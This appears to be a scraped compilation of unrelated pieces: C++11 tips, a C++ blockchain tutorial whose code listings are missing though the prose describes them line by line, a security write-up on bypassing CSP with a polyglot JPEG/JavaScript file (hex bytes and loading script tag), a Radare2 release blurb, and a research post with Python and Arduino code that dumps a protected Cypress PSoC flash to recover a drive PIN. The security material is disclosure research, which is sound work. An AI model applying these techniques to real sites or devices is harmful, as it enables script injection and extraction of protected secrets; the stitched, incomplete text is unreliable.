#define rep(i, begin, end) for (__typeof(end) i = (begin) - ((begin) > (end)); i != (end) - ((begin) > (end)); i += 1 - 2 * ((begin) > (end)))

First of all, you don’t need to name the type you want to use. Second of all it goes forwards and backwards based on (begin > end) condition. e.g. rep(i, 1, 10) is 1, 2, …, 8, 9 and rep(i, 10, 1) is 9, 8, …, 2, 1

It works well with different types e.g.

vector<int> v = {4, 5, 6, 4, 8};
rep(it, end(v), begin(v))
    cout << *it << ' ';
// prints "8 4 6 5 4"

Also there is another great feature of C++11, lambda functions!

Lambdas are like other languages’ closure. It defines like this:

[capture list](parameters) -> return value { body }

one) Capture List: simple! We don’t need it here, so just put []

two) parameters: simple! e.g. int x, string s

three) return value: simple again! e.g. pair<int, int> which can be omitted most of the times (thanks to Jacob)

four) body: contains function bodies, and returns return value.

e.g.

auto f = [] (int a, int b) -> int { return a + b; };
cout << f(1, 2); // prints "3"

You can use lambdas in for_eachsort and many more STL functions:

vector<int> v = {3, 1, 2, 1, 8};
sort(begin(v), end(v), [] (int a, int b) { return a > b; });
for (auto i: v) cout << i << ' ';

Output:

8 3 2 1 1

From Igorjan94‘s comment:

Usage of move:

When you work with STL containers like vector, you can use move function to just move container, not to copy it all.

vector<int> v = {1, 2, 3, 4};
vector<int> w = move(v);

cout << "v: ";
for (auto i: v)
    cout << i << ' ';

cout << "\nw: ";
for (auto i: w)
    cout << i << ' ';

Output:

v: 
w: 1 2 3 4 

As you can see v moved to w and not copied.

7. C++0x Strings

one) Raw Strings (From IvayloS‘s comment)

You can have UTF-8 strings, Raw strings and more. Here I want to show raw strings. We define a raw string as below:

string s = R"(Hello, World!)"; // Stored: "Hello, World!"

A raw string skips all escape characters like \n or \". e.g.

string str = "Hello\tWorld\n";
string r_str = R"(Hello\tWorld\n)";
cout << str << r_str;

Output:

Hello	World
Hello\tWorld\n

You can also have multiple line raw string:

string r_str =
R"(Dear Programmers,
I'm using C++11
Regards, Swift!)";
cout << r_str;

Output:

Dear Programmer,
I'm using C++11
Regards, Swift!

two) Regular Expressions (regex)

Regular expressions are useful tools in programming, we can define a regular expression by regex e.g. regex r = "[a-z]+";. We will use raw string for them because sometimes they have \ and other characters. Look at the example:

regex email_pattern(R"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"); // This email pattern is not totally correct! It's correct for most emails.

string
valid_email("swift@codeforces.com"),
invalid_email("hello world");

if (regex_match(valid_email, email_pattern))
    cout << valid_email << " is valid\n";
else
    cout << valid_email << " is invalid\n";

if (regex_match(invalid_email, email_pattern))
    cout << invalid_email << " is valid\n";
else
    cout << invalid_email << " is invalid\n";

Output:

swift@codeforces.com is valid
hello world is invalid

Note: You can learn Regex in this website.

three) User-defined literals

You already know literals from C++ like: 0xA1000ll3.14f and so on…

Now you can have your own custom literals! Sounds great 🙂 So let’s see an example:

long long operator "" _m(unsigned long long literal) {
	return literal;
}

long double operator "" _cm(unsigned long long literal) {
	return literal / 100.0;
}

long long operator "" _km(unsigned long long literal) {
	return literal * 1000;
}

int main() {
	// See results in meter:
	cout << 250_m << " meters \n"; // Prints 250 meters
	cout << 12_km << " meters \n"; // Prints 12000 meters
	cout << 421_cm << " meters \n"; // Prints 4.21 meters
}

Note that a literal should start with an underscore (_). We declare a new literal by this pattern:

[returnType] operator "" _[name]([parameters]) { [body] }

note that parameters only can be one of these:

(const char *)

(unsigned long long int)

(long double)

(char)

(wchar_t)

(char16_t)

(char32_t)

(const char *, size_t)

(const wchar_t *, size_t)

(const char16_t *, size_t)

(const char32_t *, size_t)

Literals also can used with templates.

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult, some say the blockchain is immutable and to all intents and purposes they’re right but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project, I’m using CLion from JetBrains but any C++ IDE or even a text editor will do. For the interests of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder, you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):

These lines above tell the compiler to include the cstdint, and iostream libraries.

Add this line below it:

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the stdnamespace by their full names e.g. std::string, but instead use their shortened names e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; hence where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:

Unsurprisingly, we’re calling our class Block (line 1) followed by the public modifier (line 2) and public variable sPrevHash(remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes three parameters for nIndexIn, and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the parameters are passed by reference but cannot be changed, this is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7) followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword, this is to ensure the output from the method cannot be changed which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):

They tell the compiler to include the cstdint, and vector libraries, as well as the Block.h header file we have just created, and creates a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1) followed by the publicmodifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew which must be an object of the Block class we created earlier. We then specify the private modifier (line 7) followed by the private variables for _nDifficulty, and _vChain (lines 8–9) as well as the method signature for _GetLastBlock (line 11) which is also followed by the const keyword to denote that the output of the method cannot be changed.

Ain't nobody got time for that!Since blockchains use cryptography, now would be a good time to get some cryptographic functionality in our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks, we could write our own but really – in this day and age of open source software – why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.

Follow these with the implementation of our block constructor:

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1) but we also add code to copy the contents of the parameters into the the variables _nIndex, and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash, if the number of zeros is equal to or greater than the difficulty level set by the network that block is valid. If the hash is not valid a variable called a nonce is incremented and the hash created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater that the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0), (lines 3–6) then the character array or c-string is turned into a standard string (line 8). A do…while loop is then used (lines 10–13) to increment the _nNonce and _sHashis assigned with the output of _CalculateHash, the front portion of the hash is then compared the string of zeros we’ve just created; if no match is found the loop is repeated until a match is found. Once a match is found a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.

Follow these with the implementation of our blockchain constructor:

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As a blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere we have to create a block for the next block to reference, we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:

The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:

We add the signature for _GetLastBlock from Blockchain.h (line 1) followed by returning the last block found in the _vChainvector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:

As with most C/C++ programs, everything is kicked off by calling the main method, this one creates a new blockchain (line 2) and informs the user that a block is being mined by printing to the output buffer (line 4) then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:

If all goes well you should see an output like this:

Congratulations, you have just written a blockchain from scratch in C++, in case you got lost I’ve put all the files into a Github repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post

Bypassing CSP using polyglot JPEGs

James challenged me to see if it was possible to create a polyglot JavaScript/JPEG. Doing so would allow me to bypass CSP on almost any website that hosts user-uploaded images on the same domain. I gleefully took up the challenge and begun dissecting the format. The first four bytes are a valid non-ASCII JavaScript variable 0xFF 0xD8 0xFF 0xE0. Then the next two bytes specify the length of the JPEG header. If we make that length of the header 0x2F2A using the bytes 0x2F 0x2A as you might guess we have a non-ASCII variable followed by a multi-line JavaScript comment. We then have to pad out the JPEG header to the length of 0x2F2A with nulls. Here’s what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

0xFF 0xFE is the comment header 0x00 0x1C specifies the length of the comment then the rest is our JavaScript payload which is of course */=alert(«Burp rocks.»)/*

Next we need to close the JavaScript comment, I edited the last four bytes of the image data before the end of image marker. Here’s what the end of the file looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker. Great so there is our polyglot JPEG, well not quite yet. It works great if you don’t specify a charset but on Firefox when using a UTF-8 character set for the document it corrupts our polyglot when included as an script! On MDN it doesn’t state that the script supports the charset attribute but it does. So to get the script to work you need to specify the ISO-8859-1 charset on the script tag and it executes fine.

It’s worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

Here is the polyglot JPEG:

Polyglot JPEG

The code to execute the image as JavaScript is as follows:

<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>

File size restrictions

I attempted to upload this graphic as a phpBB profile picture but it has restrictions in place. There is a 6k file size limit and maximum dimensions of 90×90. I reduced the size of the logo by cropping and thought about how I could reduce the JPEG data. In the JPEG header I use /* which in hex is 0x2F and 0x2A, combined 0x2F2A which results in a length of 12074 which is a lot of padding and will result in a graphic far too big to fit as a profile picture. Looking at the ASCII table I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header whilst still being recognised as a valid JPEG file.

The smallest starting byte I could find was 0x9 (a tab character) followed by 0x3A (a colon) which results in a combined hex value of 0x093A (2362) that shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash 0x2F instead of the NULL character at the end of the JFIF identifier and an asterisk as the version number. Here’s what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A

Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

Here is the smaller graphic:

Polyglot JPEG smaller

Impact

If you allow users to upload JPEGs, these uploads are on the same domain as your app, and your CSP allows script from «self», you can bypass the CSP using a polyglot JPEG by injecting a script and pointing it to that image.

Conclusion

In conclusion if you allow JPEG uploads on your site or indeed any type of file, it’s worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it’s also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn’t be possible without the excellent work of Ange Albertini. I used his JPEG format graphicextensively to create the polygot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.

PoC 

Radare2 2.6.9 (salty peas) has been relesaed!

DOWNLOAD Radare 2.6.9

Radare2 (also known as r2) is a complete framework for reverse-engineering and analyzing binaries; composed of a set of small utilities that can be used together or independently from the command line. Built around a disassembler for computer software which generates assembly language source code from machine-executable code, it supports a variety of executable formats for different processors and operating systems.

Radare2 webui.png

Supported architectures/formats[edit]

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADDMOV A,XPUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (AXSP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
